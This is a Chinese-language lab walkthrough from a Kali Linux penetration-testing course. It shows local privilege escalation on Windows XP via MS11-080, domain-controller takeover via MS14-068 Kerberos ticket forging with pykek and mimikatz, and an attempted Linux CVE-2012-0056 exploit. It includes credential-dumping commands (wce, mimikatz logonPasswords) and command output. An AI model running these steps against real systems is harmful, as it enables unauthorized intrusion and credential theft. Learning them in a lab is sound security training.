Kali Linux渗透测试 046 利用漏洞提权

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程，教程为安全牛课堂里的《Kali Linux 渗透测试》课程

1. 使用 Ms011-080 获取 WinXP 的 SYSTEM 权限
2. Win7 使用 Ms14-068 获取 域控制器的权限
3. 利用 CVE-2012-0056 提升 linux 权限

###1. 使用 Ms011-080 获取 WinXP 的 SYSTEM 权限###

---

1. Ms011-080 对应补丁 Kb2592799

   微软官网公告(https://technet.microsoft.com/library/security/ms11-080)

   

    root@kali:~# searchsploit Ms11-080
    	------------------------------------------ --------------------------------
    	 Exploit Title                            |  Path
    	                                          | (/usr/share/exploitdb/)
    	------------------------------------------ --------------------------------
    	Microsoft Windows - 'AfdJoinLeaf' Local P | exploits/windows/local/21844.rb
    	Microsoft Windows XP/2003 - 'afd.sys' Loc | exploits/windows/local/18176.py
    	------------------------------------------ --------------------------------
    
    root@kali:~# cp /usr/share/exploitdb/exploits/windows/local/18176.py .
    
    # 将文件拷贝到 英文版 WinXP 系统(有时候中文版 XP 也可以使用)
    # 首先查看 WinXP 是否安装了 对应更新 Kb2592799
    WinXP -> 运行 -> appwiz.cpl -> 查看是否有安装 Kb2592799，有的话卸载掉
   

   

    查看 WinXP下的文件路径
   

   

   • WinXP 上安装的 python 的运行环境
     C:\Documents and Settings\kevin>cd \

       C:\>18176.py -O XP
     

     

       启动任务管理器
     

     

       结束 kevin 权限的 explorer 桌面程序
     

     

       输入 explorer
     

     

       启动 system 权限的 explorer 桌面程序
     

     

   • WinXP 无需安装 Pyhon 的运行环境

       # 使用 python2 的 pyinstaller 将 python 文件进行打包
       root@kali:~# apt-get install python-pip
       root@kali:~# pip install pyinstaller
       # 或者 WinXP 下，安装 python2.7
       C:\>pyinstaller --onefile 18176.py
       	297 INFO: Building EXE from out00-EXE.toc
       	297 INFO: Appending archive to EXE C:\dist\18176.exe
       	328 INFO: Building EXE from out00-EXE.toc completed successfully.
     

     

       # 打开文件目录，将文件复制到目标主机
       C:\>whoami
       	test
       C:\>net user test
       	本地组成员             *Users
       	全局组成员             *None
       # 查看文件位置
     

   

    	C:\>cd 111
    	C:\111>18176.exe -O XP
   

   

    	C:\WINDOWS\system32>whoami
    		SYSTEM
    	# 将自己添加为管理员组
    	C:\WINDOWS\system32>net localgroup administrators test /add
    		命令成功完成。
   

2. 使用 Ms11-046 时目标主机蓝屏(Dos)

###2. Win7 使用 Ms14-068 获取 域控制器的权限 ###

---

安全脉搏链接（https://www.secpulse.com/archives/2874.html）】

1. 使用 win2003 搭建域控制器

   • 配置并连接域控制器

       # 运行 -> dcpromo
     

   

    	# Win2003 设置成域控制器，配置静态 IP 地址
    	# Win2003 设置强密码
    	C:\>net user Administrator jlcssadmin2006...
   
    	# Win7 设置 静态 IP	并将 DNS 设置为 Win2003 的IP地址
    	# Win7 加入域控制器	
   

   
   
   

    	# 重启之后
   

   

   • 修改 Win2003 中的域控制器的用户权限
     # Win2003 -> 运行 -> dsa.msc
     
     
     

       # Win7
     

   

    	# Win2003 
   

   

    	# Win7 可以查看域控制器共享出来的文件等资源
   

   

2. 使用漏洞代码攻击域控制器

   • 获取攻击文件

       # root@kali:~# searchsploit Ms14-068
       	------------------------------------------ ----------------------------------
       	 Exploit Title                            |  Path
                                     | (/usr/share/					exploitdb/)
       	------------------------------------------ ----------------------------------
       	Microsoft Windows Kerberos - Privilege Es | exploits/windows/remote/35474.py
       	------------------------------------------ ---------------------------------
       root@kali:~# cp /usr/share/exploitdb/exploits/windows/remote/35474.py .
     

   • 域环境下使用通用工具查看本地密码

       C:\fgdump>PwDump.exe localhost	# 仅是本地密码
       C:\>wce-universal.exe	# 结果是域控制器密码
       C:\>wce-universal.exe -w
       	Administrator\LAB:jlcssadmin
       C:\Win32>mimikatz.exe
       mimikatz # ::
       mimikatz # privilege::debug
       	Privilege '20' OK
       mimikatz # kerberos::list
       mimikatz # sekurlsa::logonPasswords
     

   • 漏洞利用过程

       1. 首先在 kali 通过脚本生成一个票据文件
       	# ms14-068.py -u [email protected] -s userSID -d dc.lab.com
       	-u 用户名:登录用户名
       	-s userSID
       	-d 域控制器名称：在 Win7 计算机名称处查看，不在域控是，可以用IP地址代替
       2. 将票据文件拷贝到 win 系统里
       	# 拷贝 [email protected] 到windows系统
       3. 在 win 系统里使用 mimikatz.exe 完成权限的提升
       	# mimikatz.exe log "kerberos::ptc [email protected]" exit
     
       # 在 Win7 上使用本地用户登录
       # 查看域账号的信息
       C:\>net user
       	\\WIN7-VM 的用户帐户
       	Administrator            Guest                    John
       	user1                    user2
       	命令成功完成。
       C:\Win32>whoami.exe /all
       	[User]     = "LAB\user3"  S-1-5-21-3056505427-3800332898-2304591883-1111
       
       # kali 报错缺少模块
       root@kali:~# python 35474.py -u [email protected] -s S-1-5-21-3056505427-3800332898-2304591883-1111 -d 172.16.10.132
     
       # 下载安装模块https://github.com/bidord/pykek
     

   

    	root@kali:~/Desktop/pykek-master# python ms14-068.py -u [email protected] -s S-1-5-21-3056505427-3800332898-2304591883-1111 -d 172.16.10.132
    	Password: 
    	  [+] Building AS-REQ for 172.16.10.132... Done!
    	  [+] Sending AS-REQ to 172.16.10.132... Done!
    	  [+] Receiving AS-REP from 172.16.10.132... Done!
    	  [+] Parsing AS-REP from 172.16.10.132... Done!
    	  [+] Building TGS-REQ for 172.16.10.132... Done!
    	  [+] Sending TGS-REQ to 172.16.10.132... Done!
    	  [+] Receiving TGS-REP from 172.16.10.132... Done!
    	  [+] Parsing TGS-REP from 172.16.10.132... Done!
    	  [+] Creating ccache file '[email protected]'... Done		
    	# 将文件拷贝到 Win7
   

   

    	# 在 Win7 下执行
    	C:\mimikatz\Win32>mimikatz.exe log "kerberos::ptc [email protected]" exit
    ![在这里插入图片描述](https://img-blog.csdnimg.cn/2019041316554383.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0tldmluaGFuc2Vy,size_16,color_FFFFFF,t_70)
    	
    	# 如果injecte成功 你有可能获得到了域管理session，那么klist看一下是否有了kerberos Ticket
    	C:\mimikatz\Win32>klist
    		当前登录 ID 是 0:0x776bd
    		缓存的票证: (1)
    		#0>     客户端: user3 @ LAB.COM
    	        服务器: krbtgt/LAB.COM @ LAB.COM
    	        Kerberos 票证加密类型: RSADSI RC4-HMAC(NT)
    	        票证标志 0x50a00000 -> forwardable proxiable renewable pre_authent
    	        开始时间: 3/4/2018 2:00:45 (本地)
    	        结束时间:   3/4/2018 12:00:44 (本地)
    	        续订时间: 3/11/2018 2:00:44 (本地)
    	        会话密钥类型: RSADSI RC4-HMAC(NT)
    	C:\mimikatz\Win32>net use \\Win2003.lab.com\admin$
    		命令成功完成。
   

3. 利用 CVE-2012-0056 提升 linux 权限

---

1. 是一个关于 /proc/pid/mem 的漏洞

2. 要求：linux 内核必须大于2.6.39
   

3. 样例：使用 ubuntu11 系统

   ubuntu11 官网链接（http://old-releases.ubuntu.com/releases/11.10/）

4. 在 kali 中查询

    root@kali:~# searchsploit 18411
    	--------------------------- ----------------------------------
    	 Exploit Title             |  Path
    	                           | (/usr/share/exploitdb/)
    	--------------------------- ----------------------------------
    	Linux Kernel 2.6.39 < 3.2. | exploits/linux/local/18411.c
    	--------------------------- -------------------------------
    root@kali:~# cp /usr/share/exploitdb/exploits/linux/local/18411.c .
   

   

    # 下载了 ubuntu11，安装之后 ssh 没办法使用，文件无法导入，故无法演示 ，过程是这样的，使用 kali-1.1.0 演示一下结果。
    # kali-1.1.0 已经打了这个漏洞的补丁了，故无结果。